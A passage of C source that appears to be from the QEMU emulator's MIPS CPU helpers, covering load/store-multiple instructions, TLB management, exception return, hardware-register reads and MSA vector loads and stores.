0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { cpu_stw_mmuidx_ra(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx, GETPC()); addr += 4; } } if (do_r31) { cpu_stw_mmuidx_ra(env, addr, env->active_tc.gpr[31], mem_idx, GETPC()); } } #if defined(TARGET_MIPS64) void helper_ldm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { env->active_tc.gpr[multiple_regs[i]] = cpu_ldq_mmuidx_ra(env, addr, mem_idx, GETPC()); addr += 8; } } if (do_r31) { env->active_tc.gpr[31] = cpu_ldq_mmuidx_ra(env, addr, mem_idx, GETPC()); } } void helper_sdm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { cpu_stq_mmuidx_ra(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx, GETPC()); addr += 8; } } if (do_r31) { cpu_stq_mmuidx_ra(env, addr, env->active_tc.gpr[31], mem_idx, GETPC()); } } #endif void helper_fork(target_ulong arg1, target_ulong arg2) { /* * arg1 = rt, arg2 = rs * TODO: store to TC register */ } target_ulong helper_yield(CPUMIPSState *env, target_ulong arg) { target_long arg1 = arg; if (arg1 < 0) { /* No scheduling policy implemented. */ if (arg1 != -2) { if (env->CP0_VPEControl & (1 << CP0VPECo_YSI) && env->active_tc.CP0_TCStatus & (1 << CP0TCSt_DT)) { env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); env->CP0_VPEControl |= 4 << CP0VPECo_EXCPT; do_raise_exception(env, EXCP_THREAD, GETPC()); } } } else if (arg1 == 0) { if (0) { /* TODO: TC underflow */ env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); do_raise_exception(env, EXCP_THREAD, GETPC()); } else { /* TODO: Deallocate TC */ } } else if (arg1 > 0) { /* Yield qualifier inputs not implemented. */ env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); env->CP0_VPEControl |= 2 << CP0VPECo_EXCPT; do_raise_exception(env, EXCP_THREAD, GETPC()); } return env->CP0_YQMask; } /* TLB management */ static void r4k_mips_tlb_flush_extra(CPUMIPSState *env, int first) { /* Discard entries from env->tlb[first] onwards. */ while (env->tlb->tlb_in_use > first) { r4k_invalidate_tlb(env, --env->tlb->tlb_in_use, 0); } } static inline uint64_t get_tlb_pfn_from_entrylo(uint64_t entrylo) { #if defined(TARGET_MIPS64) return extract64(entrylo, 6, 54); #else return extract64(entrylo, 6, 24) | /* PFN */ (extract64(entrylo, 32, 32) << 24); /* PFNX */ #endif } static void r4k_fill_tlb(CPUMIPSState *env, int idx) { r4k_tlb_t *tlb; uint64_t mask = env->CP0_PageMask >> (TARGET_PAGE_BITS + 1); /* XXX: detect conflicting TLBs and raise a MCHECK exception when needed */ tlb = &env->tlb->mmu.r4k.tlb[idx]; if (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) { tlb->EHINV = 1; return; } tlb->EHINV = 0; tlb->VPN = env->CP0_EntryHi & (TARGET_PAGE_MASK << 1); #if defined(TARGET_MIPS64) tlb->VPN &= env->SEGMask; #endif tlb->ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; tlb->MMID = env->CP0_MemoryMapID; tlb->PageMask = env->CP0_PageMask; tlb->G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; tlb->V0 = (env->CP0_EntryLo0 & 2) != 0; tlb->D0 = (env->CP0_EntryLo0 & 4) != 0; tlb->C0 = (env->CP0_EntryLo0 >> 3) & 0x7; tlb->XI0 = (env->CP0_EntryLo0 >> CP0EnLo_XI) & 1; tlb->RI0 = (env->CP0_EntryLo0 >> CP0EnLo_RI) & 1; tlb->PFN[0] = (get_tlb_pfn_from_entrylo(env->CP0_EntryLo0) & ~mask) << 12; tlb->V1 = (env->CP0_EntryLo1 & 2) != 0; tlb->D1 = (env->CP0_EntryLo1 & 4) != 0; tlb->C1 = (env->CP0_EntryLo1 >> 3) & 0x7; tlb->XI1 = (env->CP0_EntryLo1 >> CP0EnLo_XI) & 1; tlb->RI1 = (env->CP0_EntryLo1 >> CP0EnLo_RI) & 1; tlb->PFN[1] = (get_tlb_pfn_from_entrylo(env->CP0_EntryLo1) & ~mask) << 12; } void r4k_helper_tlbinv(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; r4k_tlb_t *tlb; int idx; MMID = mi ? MMID : (uint32_t) ASID; for (idx = 0; idx < env->tlb->nb_tlb; idx++) { tlb = &env->tlb->mmu.r4k.tlb[idx]; tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; if (!tlb->G && tlb_mmid == MMID) { tlb->EHINV = 1; } } cpu_mips_tlb_flush(env); } void r4k_helper_tlbinvf(CPUMIPSState *env) { int idx; for (idx = 0; idx < env->tlb->nb_tlb; idx++) { env->tlb->mmu.r4k.tlb[idx].EHINV = 1; } cpu_mips_tlb_flush(env); } void r4k_helper_tlbwi(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); target_ulong VPN; uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; bool EHINV, G, V0, D0, V1, D1, XI0, XI1, RI0, RI1; r4k_tlb_t *tlb; int idx; MMID = mi ? MMID : (uint32_t) ASID; idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; tlb = &env->tlb->mmu.r4k.tlb[idx]; VPN = env->CP0_EntryHi & (TARGET_PAGE_MASK << 1); #if defined(TARGET_MIPS64) VPN &= env->SEGMask; #endif EHINV = (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) != 0; G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; V0 = (env->CP0_EntryLo0 & 2) != 0; D0 = (env->CP0_EntryLo0 & 4) != 0; XI0 = (env->CP0_EntryLo0 >> CP0EnLo_XI) &1; RI0 = (env->CP0_EntryLo0 >> CP0EnLo_RI) &1; V1 = (env->CP0_EntryLo1 & 2) != 0; D1 = (env->CP0_EntryLo1 & 4) != 0; XI1 = (env->CP0_EntryLo1 >> CP0EnLo_XI) &1; RI1 = (env->CP0_EntryLo1 >> CP0EnLo_RI) &1; tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* * Discard cached TLB entries, unless tlbwi is just upgrading access * permissions on the current entry. */ if (tlb->VPN != VPN || tlb_mmid != MMID || tlb->G != G || (!tlb->EHINV && EHINV) || (tlb->V0 && !V0) || (tlb->D0 && !D0) || (!tlb->XI0 && XI0) || (!tlb->RI0 && RI0) || (tlb->V1 && !V1) || (tlb->D1 && !D1) || (!tlb->XI1 && XI1) || (!tlb->RI1 && RI1)) { r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); } r4k_invalidate_tlb(env, idx, 0); r4k_fill_tlb(env, idx); } void r4k_helper_tlbwr(CPUMIPSState *env) { int r = cpu_mips_get_random(env); r4k_invalidate_tlb(env, r, 1); r4k_fill_tlb(env, r); } void r4k_helper_tlbp(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); r4k_tlb_t *tlb; target_ulong mask; target_ulong tag; target_ulong VPN; uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; int i; MMID = mi ? MMID : (uint32_t) ASID; for (i = 0; i < env->tlb->nb_tlb; i++) { tlb = &env->tlb->mmu.r4k.tlb[i]; /* 1k pages are not supported. */ mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); tag = env->CP0_EntryHi & ~mask; VPN = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) tag &= env->SEGMask; #endif tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* Check ASID/MMID, virtual page number & size */ if ((tlb->G == 1 || tlb_mmid == MMID) && VPN == tag && !tlb->EHINV) { /* TLB match */ env->CP0_Index = i; break; } } if (i == env->tlb->nb_tlb) { /* No match. Discard any shadow entries, if any of them match. */ for (i = env->tlb->nb_tlb; i < env->tlb->tlb_in_use; i++) { tlb = &env->tlb->mmu.r4k.tlb[i]; /* 1k pages are not supported. */ mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); tag = env->CP0_EntryHi & ~mask; VPN = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) tag &= env->SEGMask; #endif tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* Check ASID/MMID, virtual page number & size */ if ((tlb->G == 1 || tlb_mmid == MMID) && VPN == tag) { r4k_mips_tlb_flush_extra(env, i); break; } } env->CP0_Index |= 0x80000000; } } static inline uint64_t get_entrylo_pfn_from_tlb(uint64_t tlb_pfn) { #if defined(TARGET_MIPS64) return tlb_pfn << 6; #else return (extract64(tlb_pfn, 0, 24) << 6) | /* PFN */ (extract64(tlb_pfn, 24, 32) << 32); /* PFNX */ #endif } void r4k_helper_tlbr(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; r4k_tlb_t *tlb; int idx; MMID = mi ? MMID : (uint32_t) ASID; idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; tlb = &env->tlb->mmu.r4k.tlb[idx]; tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* If this will change the current ASID/MMID, flush qemu's TLB. */ if (MMID != tlb_mmid) { cpu_mips_tlb_flush(env); } r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); if (tlb->EHINV) { env->CP0_EntryHi = 1 << CP0EnHi_EHINV; env->CP0_PageMask = 0; env->CP0_EntryLo0 = 0; env->CP0_EntryLo1 = 0; } else { env->CP0_EntryHi = mi ? tlb->VPN : tlb->VPN | tlb->ASID; env->CP0_MemoryMapID = tlb->MMID; env->CP0_PageMask = tlb->PageMask; env->CP0_EntryLo0 = tlb->G | (tlb->V0 << 1) | (tlb->D0 << 2) | ((uint64_t)tlb->RI0 << CP0EnLo_RI) | ((uint64_t)tlb->XI0 << CP0EnLo_XI) | (tlb->C0 << 3) | get_entrylo_pfn_from_tlb(tlb->PFN[0] >> 12); env->CP0_EntryLo1 = tlb->G | (tlb->V1 << 1) | (tlb->D1 << 2) | ((uint64_t)tlb->RI1 << CP0EnLo_RI) | ((uint64_t)tlb->XI1 << CP0EnLo_XI) | (tlb->C1 << 3) | get_entrylo_pfn_from_tlb(tlb->PFN[1] >> 12); } } void helper_tlbwi(CPUMIPSState *env) { env->tlb->helper_tlbwi(env); } void helper_tlbwr(CPUMIPSState *env) { env->tlb->helper_tlbwr(env); } void helper_tlbp(CPUMIPSState *env) { env->tlb->helper_tlbp(env); } void helper_tlbr(CPUMIPSState *env) { env->tlb->helper_tlbr(env); } void helper_tlbinv(CPUMIPSState *env) { env->tlb->helper_tlbinv(env); } void helper_tlbinvf(CPUMIPSState *env) { env->tlb->helper_tlbinvf(env); } #if 0 static void global_invalidate_tlb(CPUMIPSState *env, uint32_t invMsgVPN2, uint8_t invMsgR, uint32_t invMsgMMid, bool invAll, bool invVAMMid, bool invMMid, bool invVA) { int idx; r4k_tlb_t *tlb; bool VAMatch; bool MMidMatch; for (idx = 0; idx < env->tlb->nb_tlb; idx++) { tlb = &env->tlb->mmu.r4k.tlb[idx]; VAMatch = (((tlb->VPN & ~tlb->PageMask) == (invMsgVPN2 & ~tlb->PageMask)) #ifdef TARGET_MIPS64 && (extract64(env->CP0_EntryHi, 62, 2) == invMsgR) #endif ); MMidMatch = tlb->MMID == invMsgMMid; if ((invAll && (idx > env->CP0_Wired)) || (VAMatch && invVAMMid && (tlb->G || MMidMatch)) || (VAMatch && invVA) || (MMidMatch && !(tlb->G) && invMMid)) { tlb->EHINV = 1; } } cpu_mips_tlb_flush(env); } #endif void helper_ginvt(CPUMIPSState *env, target_ulong arg, uint32_t type) { #if 0 FIXME bool invAll = type == 0; bool invVA = type == 1; bool invMMid = type == 2; bool invVAMMid = type == 3; uint32_t invMsgVPN2 = arg & (TARGET_PAGE_MASK << 1); uint8_t invMsgR = 0; uint32_t invMsgMMid = env->CP0_MemoryMapID; CPUState *other_cs = first_cpu; #ifdef TARGET_MIPS64 invMsgR = extract64(arg, 62, 2); #endif CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); global_invalidate_tlb(&other_cpu->env, invMsgVPN2, invMsgR, invMsgMMid, invAll, invVAMMid, invMMid, invVA); } #endif } /* Specials */ target_ulong helper_di(CPUMIPSState *env) { target_ulong t0 = env->CP0_Status; env->CP0_Status = t0 & ~(1 << CP0St_IE); return t0; } target_ulong helper_ei(CPUMIPSState *env) { target_ulong t0 = env->CP0_Status; env->CP0_Status = t0 | (1 << CP0St_IE); return t0; } static void set_pc(CPUMIPSState *env, target_ulong error_pc) { env->active_tc.PC = error_pc & ~(target_ulong)1; if (error_pc & 1) { env->hflags |= MIPS_HFLAG_M16; } else { env->hflags &= ~(MIPS_HFLAG_M16); } } static inline void exception_return(CPUMIPSState *env) { if (env->CP0_Status & (1 << CP0St_ERL)) { set_pc(env, env->CP0_ErrorEPC); env->CP0_Status &= ~(1 << CP0St_ERL); } else { set_pc(env, env->CP0_EPC); env->CP0_Status &= ~(1 << CP0St_EXL); } compute_hflags(env); } void helper_eret(CPUMIPSState *env) { exception_return(env); env->CP0_LLAddr = 1; env->lladdr = 1; } void helper_eretnc(CPUMIPSState *env) { exception_return(env); } void helper_deret(CPUMIPSState *env) { env->hflags &= ~MIPS_HFLAG_DM; compute_hflags(env); set_pc(env, env->CP0_DEPC); } static inline void check_hwrena(CPUMIPSState *env, int reg, uintptr_t pc) { if ((env->hflags & MIPS_HFLAG_CP0) || (env->CP0_HWREna & (1 << reg))) { return; } do_raise_exception(env, EXCP_RI, pc); } target_ulong helper_rdhwr_cpunum(CPUMIPSState *env) { check_hwrena(env, 0, GETPC()); return env->CP0_EBase & 0x3ff; } target_ulong helper_rdhwr_synci_step(CPUMIPSState *env) { check_hwrena(env, 1, GETPC()); return env->SYNCI_Step; } target_ulong helper_rdhwr_cc(CPUMIPSState *env) { check_hwrena(env, 2, GETPC()); // return (int32_t)cpu_mips_get_count(env); return 0; } target_ulong helper_rdhwr_ccres(CPUMIPSState *env) { check_hwrena(env, 3, GETPC()); return env->CCRes; } target_ulong helper_rdhwr_performance(CPUMIPSState *env) { check_hwrena(env, 4, GETPC()); return env->CP0_Performance0; } target_ulong helper_rdhwr_xnp(CPUMIPSState *env) { check_hwrena(env, 5, GETPC()); return (env->CP0_Config5 >> CP0C5_XNP) & 1; } void helper_pmon(CPUMIPSState *env, int function) { function /= 2; switch (function) { case 2: /* TODO: char inbyte(int waitflag); */ if (env->active_tc.gpr[4] == 0) { env->active_tc.gpr[2] = -1; } /* Fall through */ case 11: /* TODO: char inbyte (void); */ env->active_tc.gpr[2] = -1; break; case 3: case 12: printf("%c", (char)(env->active_tc.gpr[4] & 0xFF)); break; case 17: break; case 158: { unsigned char *fmt = (void *)(uintptr_t)env->active_tc.gpr[4]; printf("%s", fmt); } break; } } void helper_wait(CPUMIPSState *env) { CPUState *cs = env_cpu(env); cs->halted = 1; cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); /* * Last instruction in the block, PC was updated before * - no need to recover PC and icount. */ raise_exception(env, EXCP_HLT); } void mips_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; int error_code = 0; int excp; if (!(env->hflags & MIPS_HFLAG_DM)) { env->CP0_BadVAddr = addr; } if (access_type == MMU_DATA_STORE) { excp = EXCP_AdES; } else { excp = EXCP_AdEL; if (access_type == MMU_INST_FETCH) { error_code |= EXCP_INST_NOTAVAIL; } } do_raise_exception_err(env, excp, error_code, retaddr); } void mips_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; if (access_type == MMU_INST_FETCH) { do_raise_exception(env, EXCP_IBE, retaddr); } else { do_raise_exception(env, EXCP_DBE, retaddr); } } /* MSA */ /* Data format min and max values */ #define DF_BITS(df) (1 << ((df) + 3)) /* Element-by-element access macros */ #define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) #define MEMOP_IDX(DF) \ TCGMemOpIdx oi = make_memop_idx(MO_TE | DF | MO_UNALN, \ cpu_mmu_index(env, false)); void helper_msa_ld_b(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_BYTE) #if !defined(HOST_WORDS_BIGENDIAN) pwd->b[0] = helper_ret_ldub_mmu(env, addr + (0 << DF_BYTE), oi, GETPC()); pwd->b[1] = helper_ret_ldub_mmu(env, addr + (1 << DF_BYTE), oi, GETPC()); pwd->b[2] = helper_ret_ldub_mmu(env, addr + (2 << DF_BYTE), oi, GETPC()); pwd->b[3] = helper_ret_ldub_mmu(env, addr + (3 << DF_BYTE), oi, GETPC()); pwd->b[4] = helper_ret_ldub_mmu(env, addr + (4 << DF_BYTE), oi, GETPC()); pwd->b[5] = helper_ret_ldub_mmu(env, addr + (5 << DF_BYTE), oi, GETPC()); pwd->b[6] = helper_ret_ldub_mmu(env, addr + (6 << DF_BYTE), oi, GETPC()); pwd->b[7] = helper_ret_ldub_mmu(env, addr + (7 << DF_BYTE), oi, GETPC()); pwd->b[8] = helper_ret_ldub_mmu(env, addr + (8 << DF_BYTE), oi, GETPC()); pwd->b[9] = helper_ret_ldub_mmu(env, addr + (9 << DF_BYTE), oi, GETPC()); pwd->b[10] = helper_ret_ldub_mmu(env, addr + (10 << DF_BYTE), oi, GETPC()); pwd->b[11] = helper_ret_ldub_mmu(env, addr + (11 << DF_BYTE), oi, GETPC()); pwd->b[12] = helper_ret_ldub_mmu(env, addr + (12 << DF_BYTE), oi, GETPC()); pwd->b[13] = helper_ret_ldub_mmu(env, addr + (13 << DF_BYTE), oi, GETPC()); pwd->b[14] = helper_ret_ldub_mmu(env, addr + (14 << DF_BYTE), oi, GETPC()); pwd->b[15] = helper_ret_ldub_mmu(env, addr + (15 << DF_BYTE), oi, GETPC()); #else pwd->b[0] = helper_ret_ldub_mmu(env, addr + (7 << DF_BYTE), oi, GETPC()); pwd->b[1] = helper_ret_ldub_mmu(env, addr + (6 << DF_BYTE), oi, GETPC()); pwd->b[2] = helper_ret_ldub_mmu(env, addr + (5 << DF_BYTE), oi, GETPC()); pwd->b[3] = helper_ret_ldub_mmu(env, addr + (4 << DF_BYTE), oi, GETPC()); pwd->b[4] = helper_ret_ldub_mmu(env, addr + (3 << DF_BYTE), oi, GETPC()); pwd->b[5] = helper_ret_ldub_mmu(env, addr + (2 << DF_BYTE), oi, GETPC()); pwd->b[6] = helper_ret_ldub_mmu(env, addr + (1 << DF_BYTE), oi, GETPC()); pwd->b[7] = helper_ret_ldub_mmu(env, addr + (0 << DF_BYTE), oi, GETPC()); pwd->b[8] = helper_ret_ldub_mmu(env, addr + (15 << DF_BYTE), oi, GETPC()); pwd->b[9] = helper_ret_ldub_mmu(env, addr + (14 << DF_BYTE), oi, GETPC()); pwd->b[10] = helper_ret_ldub_mmu(env, addr + (13 << DF_BYTE), oi, GETPC()); pwd->b[11] = helper_ret_ldub_mmu(env, addr + (12 << DF_BYTE), oi, GETPC()); pwd->b[12] = helper_ret_ldub_mmu(env, addr + (11 << DF_BYTE), oi, GETPC()); pwd->b[13] = helper_ret_ldub_mmu(env, addr + (10 << DF_BYTE), oi, GETPC()); pwd->b[14] = helper_ret_ldub_mmu(env, addr + (9 << DF_BYTE), oi, GETPC()); pwd->b[15] = helper_ret_ldub_mmu(env, addr + (8 << DF_BYTE), oi, GETPC()); #endif } void helper_msa_ld_h(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_HALF) #if !defined(HOST_WORDS_BIGENDIAN) pwd->h[0] = helper_ret_lduw_mmu(env, addr + (0 << DF_HALF), oi, GETPC()); pwd->h[1] = helper_ret_lduw_mmu(env, addr + (1 << DF_HALF), oi, GETPC()); pwd->h[2] = helper_ret_lduw_mmu(env, addr + (2 << DF_HALF), oi, GETPC()); pwd->h[3] = helper_ret_lduw_mmu(env, addr + (3 << DF_HALF), oi, GETPC()); pwd->h[4] = helper_ret_lduw_mmu(env, addr + (4 << DF_HALF), oi, GETPC()); pwd->h[5] = helper_ret_lduw_mmu(env, addr + (5 << DF_HALF), oi, GETPC()); pwd->h[6] = helper_ret_lduw_mmu(env, addr + (6 << DF_HALF), oi, GETPC()); pwd->h[7] = helper_ret_lduw_mmu(env, addr + (7 << DF_HALF), oi, GETPC()); #else pwd->h[0] = helper_ret_lduw_mmu(env, addr + (3 << DF_HALF), oi, GETPC()); pwd->h[1] = helper_ret_lduw_mmu(env, addr + (2 << DF_HALF), oi, GETPC()); pwd->h[2] = helper_ret_lduw_mmu(env, addr + (1 << DF_HALF), oi, GETPC()); pwd->h[3] = helper_ret_lduw_mmu(env, addr + (0 << DF_HALF), oi, GETPC()); pwd->h[4] = helper_ret_lduw_mmu(env, addr + (7 << DF_HALF), oi, GETPC()); pwd->h[5] = helper_ret_lduw_mmu(env, addr + (6 << DF_HALF), oi, GETPC()); pwd->h[6] = helper_ret_lduw_mmu(env, addr + (5 << DF_HALF), oi, GETPC()); pwd->h[7] = helper_ret_lduw_mmu(env, addr + (4 << DF_HALF), oi, GETPC()); #endif } void helper_msa_ld_w(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_WORD) #if !defined(HOST_WORDS_BIGENDIAN) pwd->w[0] = helper_ret_ldul_mmu(env, addr + (0 << DF_WORD), oi, GETPC()); pwd->w[1] = helper_ret_ldul_mmu(env, addr + (1 << DF_WORD), oi, GETPC()); pwd->w[2] = helper_ret_ldul_mmu(env, addr + (2 << DF_WORD), oi, GETPC()); pwd->w[3] = helper_ret_ldul_mmu(env, addr + (3 << DF_WORD), oi, GETPC()); #else pwd->w[0] = helper_ret_ldul_mmu(env, addr + (1 << DF_WORD), oi, GETPC()); pwd->w[1] = helper_ret_ldul_mmu(env, addr + (0 << DF_WORD), oi, GETPC()); pwd->w[2] = helper_ret_ldul_mmu(env, addr + (3 << DF_WORD), oi, GETPC()); pwd->w[3] = helper_ret_ldul_mmu(env, addr + (2 << DF_WORD), oi, GETPC()); #endif } void helper_msa_ld_d(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_DOUBLE) pwd->d[0] = helper_ret_ldq_mmu(env, addr + (0 << DF_DOUBLE), oi, GETPC()); pwd->d[1] = helper_ret_ldq_mmu(env, addr + (1 << DF_DOUBLE), oi, GETPC()); } #define MSA_PAGESPAN(x) \ ((((x) & ~TARGET_PAGE_MASK) + MSA_WRLEN / 8 - 1) >= TARGET_PAGE_SIZE) static inline void ensure_writable_pages(CPUMIPSState *env, target_ulong addr, int mmu_idx, uintptr_t retaddr) { /* FIXME: Probe the actual accesses (pass and use a size) */ if (unlikely(MSA_PAGESPAN(addr))) { /* first page */ probe_write(env, addr, 0, mmu_idx, retaddr); /* second page */ addr = (addr & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; probe_write(env, addr, 0, mmu_idx, retaddr); } } void helper_msa_st_b(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); MEMOP_IDX(DF_BYTE) ensure_writable_pages(env, addr, mmu_idx, GETPC()); #if !defined(HOST_WORDS_BIGENDIAN) helper_ret_stb_mmu(env, addr + (0 << DF_BYTE), pwd->b[0], oi, GETPC()); helper_ret_stb_mmu(env, addr + (1 << DF_BYTE), pwd->b[1], oi, GETPC()); helper_ret_stb_mmu(env, addr + (2 << DF_BYTE), pwd->b[2], oi, GETPC()); helper_ret_stb_mmu(env, addr + (3 << DF_BYTE), pwd->b[3], oi, GETPC()); helper_ret_stb_mmu(env, addr + (4 << DF_BYTE), pwd->b[4], oi, GETPC()); helper_ret_stb_mmu(env, addr + (5 << DF_BYTE), pwd->b[5], oi, GETPC()); helper_ret_stb_mmu(env, addr + (6 << DF_BYTE), pwd->b[6], oi, GETPC()); helper_ret_stb_mmu(env, addr + (7 << DF_BYTE), pwd->b[7], oi, GETPC()); helper_ret_stb_mmu(env, addr + (8 << DF_BYTE), pwd->b[8], oi, GETPC()); helper_ret_stb_mmu(env, addr + (9 << DF_BYTE), pwd->b[9], oi, GETPC()); helper_ret_stb_mmu(env, addr + (10 << DF_BYTE), pwd->b[10], oi, GETPC()); helper_ret_stb_mmu(env, addr + (11 << DF_BYTE), pwd->b[11], oi, GETPC()); helper_ret_stb_mmu(env, addr + (12 << DF_BYTE), pwd->b[12], oi, GETPC()); helper_ret_stb_mmu(env, addr + (13 << DF_BYTE), pwd->b[13], oi, GETPC()); helper_ret_stb_mmu(env, addr + (14 << DF_BYTE), pwd->b[14], oi, GETPC()); helper_ret_stb_mmu(env, addr + (15 << DF_BYTE), pwd->b[15], oi, GETPC()); #else helper_ret_stb_mmu(env, addr + (7 << DF_BYTE), pwd->b[0], oi, GETPC()); helper_ret_stb_mmu(env, addr + (6 << DF_BYTE), pwd->b[1], oi, GETPC()); helper_ret_stb_mmu(env, addr + (5 << DF_BYTE), pwd->b[2], oi, GETPC()); helper_ret_stb_mmu(env, addr + (4 << DF_BYTE), pwd->b[3], oi, GETPC()); helper_ret_stb_mmu(env, addr + (3 << DF_BYTE), pwd->b[4], oi, GETPC()); helper_ret_stb_mmu(env, addr + (2 << DF_BYTE), pwd->b[5], oi, GETPC()); helper_ret_stb_mmu(env, addr + (1 << DF_BYTE), pwd->b[6], oi, GETPC()); helper_ret_stb_mmu(env, addr + (0 << DF_BYTE), pwd->b[7], oi, GETPC()); helper_ret_stb_mmu(env, addr + (15 << DF_BYTE), pwd->b[8], oi, GETPC()); helper_ret_stb_mmu(env, addr + (14 << DF_BYTE), pwd->b[9], oi, GETPC()); helper_ret_stb_mmu(env, addr + (13 << DF_BYTE), pwd->b[10], oi, GETPC()); helper_ret_stb_mmu(env, addr + (12 << DF_BYTE), pwd->b[11], oi, GETPC()); helper_ret_stb_mmu(env, addr + (11 << DF_BYTE), pwd->b[12], oi, GETPC()); helper_ret_stb_mmu(env, addr + (10 << DF_BYTE), pwd->b[13], oi, GETPC()); helper_ret_stb_mmu(env, addr + (9 << DF_BYTE), pwd->b[14], oi, GETPC()); helper_ret_stb_mmu(env, addr + (8 << DF_BYTE), pwd->b[15], oi, GETPC()); #endif } void helper_msa_st_h(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); MEMOP_IDX(DF_HALF) ensure_writable_pages(env, addr, mmu_idx, GETPC()); #if !defined(HOST_WORDS_BIGENDIAN) helper_ret_stw_mmu(env, addr + (0 << DF_HALF), pwd->h[0], oi, GETPC()); helper_ret_stw_mmu(env, addr + (1 << DF_HALF), pwd->h[1], oi, GETPC()); helper_ret_stw_mmu(env, addr + (2 << DF_HALF), pwd->h[2], oi, GETPC()); helper_ret_stw_mmu(env, addr + (3 << DF_HALF), pwd->h[3], oi, GETPC()); helper_ret_stw_mmu(env, addr + (4 << DF_HALF), pwd->h[4], oi, GETPC()); helper_ret_stw_mmu(env, addr + (5 << DF_HALF), pwd->h[5], oi, GETPC()); helper_ret_stw_mmu(env, addr + (6 << DF_HALF), pwd->h[6], oi, GETPC()); helper_ret_stw_mmu(env, addr + (7 << DF_HALF), pwd->h[7], oi, GETPC()); #else helper_ret_stw_mmu(env, addr + (3 << DF_HALF), pwd->h[0], oi, GETPC()); helper_ret_stw_mmu(env, addr + (2 << DF_HALF), pwd->h[1], oi, GETPC()); helper_ret_stw_mmu(env, addr + (1 << DF_HALF), pwd->h[2], oi, GETPC()); helper_ret_stw_mmu(env, addr + (0 << DF_HALF), pwd->h[3], oi, GETPC()); helper_ret_stw_mmu(env, addr + (7 << DF_HALF), pwd->h[4], oi, GETPC()); helper_ret_stw_mmu(env, addr + (6 << DF_HALF), pwd->h[5], oi, GETPC()); helper_ret_stw_mmu(env, addr + (5 << DF_HALF), pwd->h[6], oi, GETPC()); helper_ret_stw_mmu(env, addr + (4 << DF_HALF), pwd->h[7], oi, GETPC()); #endif } void helper_msa_st_w(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); 